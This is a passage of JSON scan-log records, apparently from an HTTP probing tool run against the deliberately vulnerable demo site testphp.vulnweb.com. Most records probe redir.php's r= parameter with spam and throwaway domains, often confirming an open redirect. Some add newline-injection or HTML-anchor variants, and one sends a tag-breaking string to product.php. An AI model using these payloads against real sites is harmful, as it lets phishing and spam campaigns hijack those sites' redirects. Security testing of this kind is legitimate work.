details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=7\",\"time\":\"357.299643ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":532,\"lines\":111,\"status_code\":200,\"content_length\":5734,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:57.735075183Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=8274\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=8274\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=8274\",\"time\":\"347.701988ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":490,\"lines\":111,\"status_code\":200,\"content_length\":5056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.06372844Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=\\u003c/Title/\\u003c/Script/\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=\\u003c/Title/\\u003c/Script/\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=\\u003c/Title/\\u003c/Script/\",\"time\":\"344.545334ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.089778603Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php\",\"input\":\"http://testphp.vulnweb.com/redir.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php\",\"time\":\"346.597877ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.09619243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=vuln1\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=vuln1\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=vuln1\",\"time\":\"352.396881ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.16285622Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//unrosevensozz.tk/113testphpvulnwebcomKXy651\",\"input\":\"http://testphp.vulnweb.com/redir.php%3Fr%3D//unrosevensozz.tk/113testphpvulnwebcomKXy651\",\"location\":\"//unrosevensozz.tk/113testphpvulnwebcomKXy651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//unrosevensozz.tk/113testphpvulnwebcomKXy651\",\"time\":\"344.104783ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.222352473Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r\",\"time\":\"356.345919ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.332826472Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://mungty26.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://mungty26.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=%0Ahttps://mungty26.blogspot.com\",\"time\":\"354.882135ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.367578397Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://uspharmus14.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://uspharmus14.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=%0Ahttps://uspharmus14.blogspot.com\",\"time\":\"354.747654ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.441947879Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://uspharmus18.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://uspharmus18.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=%0Ahttps://uspharmus18.blogspot.com\",\"time\":\"351.870843ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.494864139Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://wishnotes351.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://wishnotes351.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=%0Ahttps://wishnotes351.blogspot.com\",\"time\":\"339.792671ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.561554254Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://wishnotes36.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://wishnotes36.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=%0Ahttps://wishnotes36.blogspot.com\",\"time\":\"352.681826ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.648827279Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://wishnotes41.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%0Ahttps://wishnotes41.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=%0Ahttps://wishnotes41.blogspot.com\",\"time\":\"350.650213ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":18,\"lines\":3,\"status_code\":200,\"content_length\":113,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:58.726778775Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://laceight.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://laceight.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:01.955791282Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacfive.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacfive.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:02.092781641Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacfour.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacfour.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:02.199996512Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacnine6.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacnine6.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:02.241182163Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacseven.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacseven.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:02.588811125Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacsix.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacsix.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:03.008557569Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacten.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacten.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:03.030673479Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacthree.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lacthree.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:03.218857013Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lactwo5.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://lactwo5.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:03.737503159Z\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://release64.blogspot.com/%3C/a\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=%3Ca%20href=https://release64.blogspot.com/%3C/a\",\"error\":\"first path segment in URL cannot contain colon\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:27:03.851300728Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//0s6g879.cyou/143testphpvulnwebcomDbABRT351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//0s6g879.cyou/143testphpvulnwebcomDbABRT351\",\"location\":\"//0s6g879.cyou/143testphpvulnwebcomDbABRT351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//0s6g879.cyou/143testphpvulnwebcomDbABRT351\",\"time\":\"352.065463ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:05.507262018Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//3es9cwaguz.xyz/180-testphpvulnwebcomDkR651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//3es9cwaguz.xyz/180-testphpvulnwebcomDkR651\",\"location\":\"//3es9cwaguz.xyz/180-testphpvulnwebcomDkR651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//3es9cwaguz.xyz/180-testphpvulnwebcomDkR651\",\"time\":\"348.925536ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:06.819957784Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//4xrhzam.cyou/143testphpvulnwebcomScYnpq351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//4xrhzam.cyou/143testphpvulnwebcomScYnpq351\",\"location\":\"//4xrhzam.cyou/143testphpvulnwebcomScYnpq351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//4xrhzam.cyou/143testphpvulnwebcomScYnpq351\",\"time\":\"356.462675ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:06.834673217Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//amposkitzladgui.tk/143testphpvulnwebcomVNPwLT351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//amposkitzladgui.tk/143testphpvulnwebcomVNPwLT351\",\"location\":\"//amposkitzladgui.tk/143testphpvulnwebcomVNPwLT351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//amposkitzladgui.tk/143testphpvulnwebcomVNPwLT351\",\"time\":\"348.995839ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:07.157033082Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//bhajonspecunexpu.ga/113testphpvulnwebcomWqk651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//bhajonspecunexpu.ga/113testphpvulnwebcomWqk651\",\"location\":\"//bhajonspecunexpu.ga/113testphpvulnwebcomWqk651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//bhajonspecunexpu.ga/113testphpvulnwebcomWqk651\",\"time\":\"352.178756ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.023576929Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//biowazea.tk/143testphpvulnwebcomARLCFb351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//biowazea.tk/143testphpvulnwebcomARLCFb351\",\"location\":\"//biowazea.tk/143testphpvulnwebcomARLCFb351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//biowazea.tk/143testphpvulnwebcomARLCFb351\",\"time\":\"347.557303ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.03901897Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//bottridgliganabnya.tk/180testphpvulnwebcomYBX649\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//bottridgliganabnya.tk/180testphpvulnwebcomYBX649\",\"location\":\"//bottridgliganabnya.tk/180testphpvulnwebcomYBX649\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//bottridgliganabnya.tk/180testphpvulnwebcomYBX649\",\"time\":\"348.226345ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.081570709Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//bractamonfimiss.tk/180testphpvulnwebcomRya649\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//bractamonfimiss.tk/180testphpvulnwebcomRya649\",\"location\":\"//bractamonfimiss.tk/180testphpvulnwebcomRya649\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//bractamonfimiss.tk/180testphpvulnwebcomRya649\",\"time\":\"344.504398ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.086731163Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//catstantgorla.tk/113testphpvulnwebcomikm651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//catstantgorla.tk/113testphpvulnwebcomikm651\",\"location\":\"//catstantgorla.tk/113testphpvulnwebcomikm651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//catstantgorla.tk/113testphpvulnwebcomikm651\",\"time\":\"348.020687ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.420137409Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//ccpmxuoz.pics/180-testphpvulnwebcomkwr651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//ccpmxuoz.pics/180-testphpvulnwebcomkwr651\",\"location\":\"//ccpmxuoz.pics/180-testphpvulnwebcomkwr651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//ccpmxuoz.pics/180-testphpvulnwebcomkwr651\",\"time\":\"352.309462ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.447864889Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//cripapnoco.tk/143testphpvulnwebcomQJHAZf351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//cripapnoco.tk/143testphpvulnwebcomQJHAZf351\",\"location\":\"//cripapnoco.tk/143testphpvulnwebcomQJHAZf351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//cripapnoco.tk/143testphpvulnwebcomQJHAZf351\",\"time\":\"356.514654ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.448183345Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//daecronurerolme.gq/143testphpvulnwebcomVwmtLK351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//daecronurerolme.gq/143testphpvulnwebcomVwmtLK351\",\"location\":\"//daecronurerolme.gq/143testphpvulnwebcomVwmtLK351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//daecronurerolme.gq/143testphpvulnwebcomVwmtLK351\",\"time\":\"348.51628ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.517850824Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//diskcistrogura.tk/180testphpvulnwebcomCSy649\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//diskcistrogura.tk/180testphpvulnwebcomCSy649\",\"location\":\"//diskcistrogura.tk/180testphpvulnwebcomCSy649\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//diskcistrogura.tk/180testphpvulnwebcomCSy649\",\"time\":\"352.464781ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.570706051Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//dispbuda.tk/143testphpvulnwebcomFljOAJ351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//dispbuda.tk/143testphpvulnwebcomFljOAJ351\",\"location\":\"//dispbuda.tk/143testphpvulnwebcomFljOAJ351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//dispbuda.tk/143testphpvulnwebcomFljOAJ351\",\"time\":\"345.904953ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.686997171Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//doperdarapa.ml/143testphpvulnwebcomeAPGCo351\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//doperdarapa.ml/143testphpvulnwebcomeAPGCo351\",\"location\":\"//doperdarapa.ml/143testphpvulnwebcomeAPGCo351\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//doperdarapa.ml/143testphpvulnwebcomeAPGCo351\",\"time\":\"352.300954ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.725813342Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//doubtmantomerro.cf/180-testphpvulnwebcompDB651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//doubtmantomerro.cf/180-testphpvulnwebcompDB651\",\"location\":\"//doubtmantomerro.cf/180-testphpvulnwebcompDB651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//doubtmantomerro.cf/180-testphpvulnwebcompDB651\",\"time\":\"356.162903ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.793696893Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//entamankindhigca.cf/d13testphpvulnwebcom86v655\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//entamankindhigca.cf/d13testphpvulnwebcom86v655\",\"location\":\"//entamankindhigca.cf/d13testphpvulnwebcom86v655\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=//entamankindhigca.cf/d13testphpvulnwebcom86v655\",\"time\":\"348.574043ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:27:08.840834391Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=//evtosysmadasen.ml/143testphpvulnwebcomSzi651\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=//evtosysmadasen.ml/143testphpvulnwebcomSzi651\",\"location\":\"//evtosysmadasen.ml/143testphpvulnwebcomSzi651\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_t